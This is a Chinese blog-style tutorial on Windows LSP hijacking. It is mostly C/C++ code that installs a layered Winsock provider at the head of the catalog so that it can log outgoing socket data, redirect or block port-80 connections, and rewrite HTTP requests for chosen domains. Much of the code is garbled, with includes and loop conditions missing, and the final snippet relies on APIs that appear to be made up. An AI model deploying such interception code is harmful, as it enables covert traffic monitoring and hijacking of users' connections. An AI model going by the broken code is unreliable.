LSP 简介:
分层服务提供商(Layered Service Provider,LSP)是一种可以扩展Winsock作为应用程序的 Windows 的网络套接字工具的机制。Winsock LSP 可用于非常广泛的实用用途,包括 Internet 家长控制 (parental control) 和 Web 内容筛选。在以前版本的 Windows XP 中,删除不正确的(也称为“buggy”)LSP 可能会导致注册表中的 Winsock 目录损坏,潜在的导致所有网络连接的丢失。 LSP就是TCP/IP等协议的接口.LSP用在正途上可以方便程序员们编写监视系统网络通讯情况的Sniffer,可是现在常见的LSP都被用于浏览器劫持。
“浏览器劫持” 或者 “分层服务提供程序”。某些间谍软件会修改Winsock 2的设置,进行LSP“浏览器劫持”,所有与网络交换的信息都要通过这些间谍软件,从而使得它们可以监控使用者的信息。著名的如New net插件或WebHancer组件,它们是安装一些软件时带来的你不想要的东西。
LSP 劫持(Layered Service Provider Hijacking):
是一种计算机安全漏洞和攻击技术,通常与Windows操作系统相关。它涉及到网络协议栈中的层式服务提供程序(Layered Service Provider,LSP),这些提供程序用于修改、监视或过滤网络流量。LSP劫持是指攻击者通过操纵LSP,以在网络通信中插入恶意代码或进行网络监听,从而捕获敏感信息或执行恶意操作。
应用程序通过 socket 进行网络通信时会调用 ws2_32.dll 的导出函数,比如 send/recv 等,而这些函数时通过更底层的 LSP 提供的 SPI(服务提供者接口)实现的。
如果有多个符合条件的 SPI,系统将会调用在 winsock 目录最前面的那个 。所以注册一个 SPI 并插入到 winsock 目录的最前面就可以劫持了。另外劫持 LSP 需要将代码卸载 DLL 里。
实现代码:
主程序:
#include
#include
#include
#include
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "Rpcrt4.lib")
// LSP硬编码
GUID ProviderGuid = { 0xd3c21122, 0x85e1, 0x48f3, { 0x9a, 0xb6, 0x23, 0xd9, 0x0c, 0x73, 0x07, 0xef } };
LPWSAPROTOCOL_INFOW GetProvider(LPINT lpnTotalProtocols)
{
DWORD dwSize = 0;
int nError;
LPWSAPROTOCOL_INFOW pProtoInfo = NULL;
if (::WSCEnumProtocols(NULL, pProtoInfo, &dwSize, &nError) == SOCKET_ERROR)
{
if (nError != WSAENOBUFS)return NULL;
}
pProtoInfo = (LPWSAPROTOCOL_INFOW)::GlobalAlloc(GPTR, dwSize);
*lpnTotalProtocols = ::WSCEnumProtocols(NULL, pProtoInfo, &dwSize, &nError);
return pProtoInfo;
}
void FreeProvider(LPWSAPROTOCOL_INFOW pProtoInfo)
{
::GlobalFree(pProtoInfo);
}
BOOL InstallProvider(WCHAR *pwszPathName)
{
WCHAR wszLSPName[] = L"PhoenixLSP";
LPWSAPROTOCOL_INFOW pProtoInfo;
int nProtocols;
WSAPROTOCOL_INFOW OriginalProtocolInfo[3];
DWORD dwOrigCatalogId[3];
int nArrayCount = 0;
DWORD dwLayeredCatalogId; // 我们分层协议的目录ID号
int nError;
// 找到我们的下层协议,将信息放入数组中
// 枚举所有服务程序提供者
pProtoInfo = GetProvider(&nProtocols);
BOOL bFindUdp = FALSE;
BOOL bFindTcp = FALSE;
BOOL bFindRaw = FALSE;
for (int i = 0; i 0; j--)
{
OriginalProtocolInfo[i].ProtocolChain.ChainEntries[j]= OriginalProtocolInfo[i].ProtocolChain.ChainEntries[j - 1];
}
}
OriginalProtocolInfo[i].ProtocolChain.ChainLen++;
OriginalProtocolInfo[i].ProtocolChain.ChainEntries[0] = dwLayeredCatalogId;
}
// 获取一个Guid,安装之
GUID ProviderChainGuid;
if (::UuidCreate(&ProviderChainGuid) == RPC_S_OK)
{
if (WSCInstallProvider(&ProviderChainGuid,pwszPathName, OriginalProtocolInfo, nArrayCount, &nError) == SOCKET_ERROR)
{
printf("UuidCreate1n");
return FALSE;
}
}
else
{
printf("UuidCreate2n");
return FALSE;
}
// 重新排序Winsock目录,将我们的协议链提前
// 重新枚举安装的协议
FreeProvider(pProtoInfo);
pProtoInfo = GetProvider(&nProtocols);
DWORD dwIds[20];
int nIndex = 0;
// 添加我们的协议链
for (int i = 0; i 1) &&(pProtoInfo[i].ProtocolChain.ChainEntries[0] == dwLayeredCatalogId))
dwIds[nIndex++] = pProtoInfo[i].dwCatalogEntryId;
}
// 添加其它协议
for (int i = 0; i 1) &&(pProtoInfo[i].ProtocolChain.ChainEntries[0] == dwLayeredCatalogId))
{
WSCDeinstallProvider(&pProtoInfo[i].ProviderId, &nError);
}
}
// 移除分层协议
::WSCDeinstallProvider(&ProviderGuid, &nError);
}
return TRUE;
}
void main(void)
{
//安装协议
TCHAR szPathName[256];
TCHAR* p;
if (::GetFullPathName(L"LSP.dll", 256, szPathName, &p) != 0)
{
if (InstallProvider(szPathName))
{
printf(" Install successully. n");
}
}
system("pause");
//移除协议
if (RemoveProvider())
printf(" Deinstall successully. n");
else
printf(" Deinstall failed. n");
system("pause");
return 0;
}
LSP.Dll
#include
#include
#include
#include
#include
#pragma comment(lib, "Ws2_32.lib")
WSPUPCALLTABLE g_pUpCallTable; // 上层函数列表。如果LSP创建了自己的伪句柄,才使用这个函数列表
WSPPROC_TABLE g_NextProcTable; // 下层函数列表
TCHAR g_szCurrentApp[MAX_PATH]; // 当前调用本DLL的程序的名称
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
GetModuleFileName(NULL, g_szCurrentApp, MAX_PATH);
}
break;
}
return TRUE;
}
LPWSAPROTOCOL_INFOW GetProvider(LPINT lpnTotalProtocols)
{
DWORD dwSize = 0;
int nError;
LPWSAPROTOCOL_INFOW pProtoInfo = NULL;
// 取得需要的长度
if (WSCEnumProtocols(NULL, pProtoInfo, &dwSize, &nError) == SOCKET_ERROR)
{
if (nError != WSAENOBUFS)return NULL;
}
pProtoInfo = (LPWSAPROTOCOL_INFOW)::GlobalAlloc(GPTR, dwSize);
*lpnTotalProtocols = ::WSCEnumProtocols(NULL, pProtoInfo, &dwSize, &nError);
return pProtoInfo;
}
void FreeProvider(LPWSAPROTOCOL_INFOW pProtoInfo)
{
GlobalFree(pProtoInfo);
}
int WSPAPI WSPSendTo(
SOCKET s,
LPWSABUF lpBuffers,
DWORD dwBufferCount,
LPDWORD lpNumberOfBytesSent,
DWORD dwFlags,
const struct sockaddr FAR * lpTo,
int iTolen,
LPWSAOVERLAPPED lpOverlapped,
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine,
LPWSATHREADID lpThreadId,
LPINT lpErrno
)
{
OutputDebugString(g_szCurrentApp);
// 拒绝所有目的端口为4567的UDP封包
SOCKADDR_IN sa = *(SOCKADDR_IN*)lpTo;
if (sa.sin_port == htons(4567))
{
int iError;
g_NextProcTable.lpWSPShutdown(s, SD_BOTH, &iError);
*lpErrno = WSAECONNABORTED;
return SOCKET_ERROR;
}
return g_NextProcTable.lpWSPSendTo(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpTo, iTolen, lpOverlapped, lpCompletionRoutine, lpThreadId, lpErrno);
}
int WSPAPI WSPSend(
SOCKET s,
LPWSABUF lpBuffers,
DWORD dwBufferCount,
LPDWORD lpNumberOfBytesSent,
DWORD dwFlags,
LPWSAOVERLAPPED lpOverlapped,
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine,
LPWSATHREADID lpThreadId,
LPINT lpErrno
)
{
if (lpBuffers)
{
if (lpBuffers->len > 1 && lpBuffers->buf)
{
char szText[20480] = { 0 };
_snprintf_s(szText, sizeof(szText), ("当前数据:长度%d 数据%sn"), lpBuffers->len, lpBuffers->buf);
OutputDebugStringA(szText);
}
}
return g_NextProcTable.lpWSPSend(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine, lpThreadId, lpErrno);
}
int WSPAPI WSPConnect(
SOCKET s,
const struct sockaddr FAR* name,
int namelen,
LPWSABUF lpCallerData,
LPWSABUF lpCalleeData,
LPQOS lpSQOS,
LPQOS lpGQOS,
LPINT lpErrno
)
{
PSOCKADDR_IN paddrSrv = (SOCKADDR_IN*)name;
if (paddrSrv)
{
if (paddrSrv->sin_family==AF_INET)
{
if (ntohs(paddrSrv->sin_port)==80)
{
OutputDebugString(g_szCurrentApp);
char szText[MAX_PATH] = { 0 };
_snprintf_s(szText, sizeof(szText), ("当前端口%d ---IP地址%s Ip地址%dn"), ntohs(paddrSrv->sin_port), inet_ntoa(paddrSrv->sin_addr), paddrSrv->sin_addr.S_un.S_addr);
OutputDebugStringA(szText);
paddrSrv->sin_addr.S_un.S_addr = inet_addr("8.8.8.8");
_snprintf_s(szText, sizeof(szText), ("修改后端口%d ---IP地址%s Ip地址%dn"), ntohs(paddrSrv->sin_port), inet_ntoa(paddrSrv->sin_addr), paddrSrv->sin_addr.S_un.S_addr);
OutputDebugStringA(szText);
}
}
}
return g_NextProcTable.lpWSPConnect(s, name, namelen, lpCallerData, lpCalleeData, lpSQOS, lpGQOS, lpErrno);
}
int WSPAPI WSPStartup(
WORD wVersionRequested,
LPWSPDATA lpWSPData,
LPWSAPROTOCOL_INFO lpProtocolInfo,
WSPUPCALLTABLE UpcallTable,
LPWSPPROC_TABLE lpProcTable
)
{
OutputDebugString(g_szCurrentApp);
if (lpProtocolInfo->ProtocolChain.ChainLen ProtocolChain.ChainEntries[1];
for ( i = 0; i = nTotalProtos)
{
OutputDebugString(TEXT("WSPStartup: Can not find underlying protocol"));
return WSAEPROVIDERFAILEDINIT;
}
// 加载下层协议的DLL
int nError;
TCHAR szBaseProviderDll[MAX_PATH];
int nLen = MAX_PATH;
// 取得下层提供程序DLL路径
if (::WSCGetProviderPath(&NextProtocolInfo.ProviderId, szBaseProviderDll, &nLen, &nError) == SOCKET_ERROR)
{
OutputDebugString(TEXT("WSPStartup: WSCGetProviderPath() failed"));
return WSAEPROVIDERFAILEDINIT;
}
if (!::ExpandEnvironmentStrings(szBaseProviderDll, szBaseProviderDll, MAX_PATH))
{
OutputDebugString(TEXT("WSPStartup: ExpandEnvironmentStrings() failed"));
return WSAEPROVIDERFAILEDINIT;
}
// 加载下层提供程序
HMODULE hModule = ::LoadLibrary(szBaseProviderDll);
if (hModule == NULL)
{
//ODS1(L" WSPStartup: LoadLibrary() failed %d n", ::GetLastError());
OutputDebugString(TEXT("WSPStartup: LoadLibrary() failed"));
return WSAEPROVIDERFAILEDINIT;
}
// 导入下层提供程序的WSPStartup函数
LPWSPSTARTUP pfnWSPStartup = NULL;
pfnWSPStartup = (LPWSPSTARTUP)::GetProcAddress(hModule, "WSPStartup");
if (pfnWSPStartup == NULL)
{
//ODS1(L" WSPStartup: GetProcAddress() failed %d n", ::GetLastError());
OutputDebugString(TEXT("WSPStartup: GetProcAddress() failed"));
return WSAEPROVIDERFAILEDINIT;
}
// 调用下层提供程序的WSPStartup函数
LPWSAPROTOCOL_INFOW pInfo = lpProtocolInfo;
if (NextProtocolInfo.ProtocolChain.ChainLen == BASE_PROTOCOL)
pInfo = &NextProtocolInfo;
int nRet = pfnWSPStartup(wVersionRequested, lpWSPData, pInfo, UpcallTable, lpProcTable);
if (nRet != ERROR_SUCCESS)
{
OutputDebugString(TEXT(" WSPStartup: underlying provider's WSPStartup() failed"));
return nRet;
}
// 保存下层提供者的函数表
g_NextProcTable = *lpProcTable;
// 修改传递给上层的函数表,Hook感兴趣的函数,这里做为示例,仅Hook了WSPSendTo函数
// 您还可以Hook其它函数,如WSPSocket、WSPCloseSocket、WSPConnect等
//lpProcTable->lpWSPSendTo = WSPSendTo;
lpProcTable->lpWSPSend = WSPSend;
lpProcTable->lpWSPConnect = WSPConnect;
FreeProvider(pProtoInfo);
return nRet;
}
DLL源码:
// 全局遍历
WCHAR exepath[MAX_PATH] = { 0 };
WSPPROC_TABLE trueTable = { 0 };
int GetProvider(LPWSAPROTOCOL_INFOW &pProtoInfo)
{
// 首次调用,pProtoInfo传入NULL,取得需要的缓冲区长度
DWORD dwSize = 0;
int nError = 0;
if (WSCEnumProtocols(NULL, NULL, &dwSize, &nError) == SOCKET_ERROR)
{
if (nError != WSAENOBUFS)
{
return 0;
}
}
// 申请足够缓冲区内存。
pProtoInfo = (LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR, dwSize);
if (pProtoInfo == NULL)
{
return 0;
}
//再次调用WSCEnumProtocols函数
return WSCEnumProtocols(NULL, pProtoInfo, &dwSize, &nError);
}
int WSPConnect(SOCKET s, const struct sockaddr FAR* name, int namelen,
LPWSABUF lpCallerData, LPWSABUF lpCalleeData, LPQOS lpSQOS, LPQOS lpGQOS,
LPINT lpErrno)
{
SOCKADDR_IN addr = *(SOCKADDR_IN*)name;
if (addr.sin_port==htons(80))
{
MessageBoxW(0, L"有程序访问外网80端口", L"拒绝访问", 0);
return SOCKET_ERROR;
}
return trueTable.lpWSPConnect(s, name, namelen, lpCallerData, lpCalleeData, lpSQOS, lpGQOS, lpErrno);
}
int WSPAPI WSPStartup(
WORD wVersionRequested,
LPWSPDATA lpWSPData,
LPWSAPROTOCOL_INFOW lpProtocolInfo,
WSPUPCALLTABLE UpcallTable,
LPWSPPROC_TABLE lpProcTable
)
/*
当应用程序通过SOCKET创建socket时会调用系统根据Winsock目录和程序的需要来将对应的传输服务提供者,即
一个dll加载到目标进程中. 然后调用该dll提供的WSPStartup函数来初始化.初始化的
目的就是为了通过调用这个函数来获取该这次操作socket的API函数对应的SPI
这就是windows上写socket时之前必须通过WSAStartup来进行socket初始化的原因
该函数的lpProcTable 参数是个结构体,保存了所有的SPI函数.也就是可以从这个参数来获取SPI
所以只需导出这个函数,然后将其他的SPI填写到lpProcTable中,最后返回给程序
以上都是正常情况下的调用过程. 如果我们让系统加载我们给它提供的dll就可以导出该函数,并
hook掉lpProcTable中的成员进行监控. 但是我们hook该函数后允许的话应该最后要调用正常的SPI,
这时参数lpProtocolInfo就能派上用场. 通过该参数可以获取原来的协议的目录id,然后遍历winsock
目录找到对应的协议的传输服务提供者即一个dll路径,通过加载该dll并调用其中的WSPStartup即可获取
真正的SPI,然后调用它.最终可以实现监控,修改,拦截等功能
*/
{
//我们编写的DLL用于协议链中,所以如果是基础协议或分层协议使用则直接返回错误
if (lpProtocolInfo->ProtocolChain.ChainLen ProtocolChain.ChainEntries[1];//获取真正的协议目录id
int i;
//遍历查找真正的协议结构
for (i = 0; i =allproto)
{
return WSAEPROVIDERFAILEDINIT;
}
int nError;
wchar_t szBaseProviderDll[MAX_PATH];//保存真正dll路径
int nLen = MAX_PATH;
// 取得下层提供程序DLL路径
if (WSCGetProviderPath(&trueProtocolInfo.ProviderId, szBaseProviderDll, &nLen, &nError) == SOCKET_ERROR)
{
return WSAEPROVIDERFAILEDINIT;
}
//上面的函数执行后路径中会存在环境变量,通过下面展开环境变量
if (!ExpandEnvironmentStringsW(szBaseProviderDll, szBaseProviderDll, MAX_PATH))
{
return WSAEPROVIDERFAILEDINIT;
}
// 加载真正dll
HMODULE hModule = LoadLibraryW(szBaseProviderDll);
if (hModule == NULL)
{
return WSAEPROVIDERFAILEDINIT;
}
// 导入真正dll的WSPStartup函数
LPWSPSTARTUP pfnWSPStartup = NULL;
pfnWSPStartup = (LPWSPSTARTUP)GetProcAddress(hModule, "WSPStartup");
if (pfnWSPStartup == NULL)
{
return WSAEPROVIDERFAILEDINIT;
}
// 调用下层提供程序的WSPStartup函数以填充SPI地址表
LPWSAPROTOCOL_INFOW pInfo = lpProtocolInfo;
//
if (trueProtocolInfo.ProtocolChain.ChainLen == BASE_PROTOCOL)
{
pInfo = &trueProtocolInfo;
}
else
{
for (int j = 0; jProtocolChain.ChainLen; j++)
{
lpProtocolInfo->ProtocolChain.ChainEntries[j]
= lpProtocolInfo->ProtocolChain.ChainEntries[j + 1];
}
lpProtocolInfo->ProtocolChain.ChainLen--;
}
//调用真正的WSPStartup, 注意参数,协议结构参数必须是原来我们想劫持的那个协议结构
int nRet = pfnWSPStartup(wVersionRequested, lpWSPData, pInfo, UpcallTable, lpProcTable);
if (nRet != ERROR_SUCCESS)
{
return nRet;
}
memcpy(&trueTable, lpProcTable, sizeof(WSPPROC_TABLE)); //保存到trueTable中以便调用
//进行api替换
lpProcTable->lpWSPConnect = (LPWSPCONNECT)WSPConnect;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
GetModuleFileNameW(0, exepath, MAX_PATH * sizeof(wchar_t));
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
主程序:
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
GUID layerGuid;
#define layerName L"freesec"
DWORD findGuid()
{
//枚举winsock目录中的协议
LPWSAPROTOCOL_INFOW info;//指向winsock目录中协议
DWORD size = 0; //大小
DWORD num; //数量
WSCEnumProtocols(0, 0, &size, 0);
info = (LPWSAPROTOCOL_INFOW)malloc(size);
num = WSCEnumProtocols(0, info, &size, 0);
if (num == SOCKET_ERROR)
{
free(info);
return 0;
}
int i;
for ( i= 0; i 0; i--)//如果是协议链则将该协议链中其他协议往后移,
//以便将自己的分层协议插入到链首.但是这个数组最大存7个,所以如果原来就占满了,理论上会挤掉最后一个
{
save.ProtocolChain.ChainEntries[i] = save.ProtocolChain.ChainEntries[i - 1];
}
}
save.ProtocolChain.ChainEntries[0] = layerId;
save.ProtocolChain.ChainLen++;
//获取guid,安装协议链
GUID providerChainGuid;
UuidCreate(&providerChainGuid);
if (WSCInstallProvider(&providerChainGuid, dllpath, &save, 1, 0) == SOCKET_ERROR)
{
free(info);
return 0;
}
//重新枚举协议
free(info);
WSCEnumProtocols(0, 0, &size, 0);
info = (LPWSAPROTOCOL_INFOW)malloc(size);
num = WSCEnumProtocols(0, info, &size, 0);
if (num == SOCKET_ERROR)
{
free(info);
return 0;
}
//遍历获取我们的协议链的目录id
DWORD* chainId = (DWORD*)malloc(num * sizeof(DWORD)); //这个是协议链的目录id数组,把我们的协议链id
//放在最前面,系统原来的按顺序放后面
DWORD cindex = 0;
for (int i = 0; i 1) && (info[i].ProtocolChain.ChainEntries[0] == layerId))
{
chainId[cindex] = info[i].dwCatalogEntryId;
cindex++;
}
}
for (int i = 0; i 1)&&(info[i].ProtocolChain.ChainEntries[0]==Id))
{
if((result=WSCDeinstallProvider(&info[i].ProviderId, &cc))==SOCKET_ERROR)
{
free(info);
return 0;
}
break;
}
}
free(info);
if((result=WSCDeinstallProvider(&layerGuid, &cc))==SOCKET_ERROR)
{return 0;
}
}
else
{
free(info);
return 0;
}return 1;
}
int main(int argc, char** argv)
{
setlocale(LC_ALL, "chs");
int result;
if (argc!=2)
{
printf("usage:%s install or uninstalln", argv[0]);
return 0;
}
if (strcmp(argv[1],"install")==0)
{
if (lspInject())
{
printf("install successn");
}
else
{
printf("install error code is %dn", GetLastError());
}
}
else if(strcmp(argv[1], "uninstall") == 0)
{
if (uninstall())
{
printf("uninstall successn");
}
else
{
printf("uninstall error code is %dn", GetLastError());
}
}
return 1;
}
#include
#include
LRESULT CALLBACK InterceptProc(
int code,
WPARAM wParam,
LPARAM lParam
) {
// 判断是否为拦截的网络事件
if (code == LSP_CALLBACK_WSA_SEND || code == LSP_CALLBACK_WSA_SENDTO) {
// 获取传入的数据结构
LPWSABUF lpBuffers = (LPWSABUF)lParam;
// 获取发送的数据
char* data = lpBuffers->buf;
// 判断是否为指定域名
if (strstr(data, "www.chwm.vip") != NULL || strstr(data, "user.chwm.vip") != NULL) {
// 修改发送的数据,进行跳转
char* redirectData = "GET / HTTP/1.1rnHost: www.baidu.comrnrn";
lpBuffers->buf = redirectData;
lpBuffers->len = strlen(redirectData);
}
}
// 调用下一个LSP处理程序
return CallNextHookEx(NULL, code, wParam, lParam);
}
BOOL InstallLSP() {
WSPDATA wspData;
LSP_INSTALL_PROC lpfnInstallLsp;
HMODULE hModule = LoadLibrary("lsp.dll");
if (hModule == NULL) {
return FALSE;
}
lpfnInstallLsp = (LSP_INSTALL_PROC)GetProcAddress(hModule, "LspInstall");
if (lpfnInstallLsp == NULL) {
FreeLibrary(hModule);
return FALSE;
}
memset(&wspData, 0, sizeof(WSPDATA));
wspData.LspCatalog = LSP_INSTALL_LAYERED_SERVICE;
// 设置拦截回调函数
wspData.lpfnInterceptProc = InterceptProc;
// 安装LSP
if (lpfnInstallLsp(&wspData, NULL, NULL, NULL) != NO_ERROR) {
FreeLibrary(hModule);
return FALSE;
}
return TRUE;
}
int main() {
// 初始化Winsock库
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
// 安装LSP
if (InstallLSP()) {
// 运行你的应用程序
// ...
// 卸载LSP
WSACleanup();
}
return 0;
}
结语
待续…………有空再更新!!!
官方网站
www.CHWM.vip
机房租用,北京机房托管,大带宽租用,IDC机房服务器主机租用托管-价格及服务咨询 www.e1idc.net